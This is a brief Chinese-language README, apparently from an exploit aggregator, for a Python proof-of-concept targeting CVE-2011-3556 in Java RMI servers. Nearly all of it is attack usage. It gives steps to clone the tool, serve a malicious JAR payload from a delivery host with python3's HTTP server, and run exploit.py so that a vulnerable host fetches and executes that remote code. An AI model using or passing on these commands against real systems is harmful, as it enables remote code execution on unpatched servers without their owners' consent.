## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SK4LA-CVE_2011_3556
# CVE-2011-3556 — 概念验证 (PoC)
## 免责声明
此工具是现有Metasploit框架中由mihi开发的概念验证 (PoC)的Python 3实现。
## 先决条件
使用此模块只需按照以下说明操作:
root@kitploit:~
# 将该仓库克隆到本地。
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/
# 可选地设置`x`位以能够直接执行脚本。
$ chmod u+x exploit.py
$ ./exploit.py --help && echo "It works!"
## 用法
### 命令行
为了被易受攻击的Java RMI服务器远程加载,有效载荷(一个JAR二进制文件)必须作为HTTP资源提供。可以使用著名的`python3 -m http.server`快速提供。
一旦有效载荷可供下载,只需执行`exploit.py`脚本即可触发漏洞。
root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`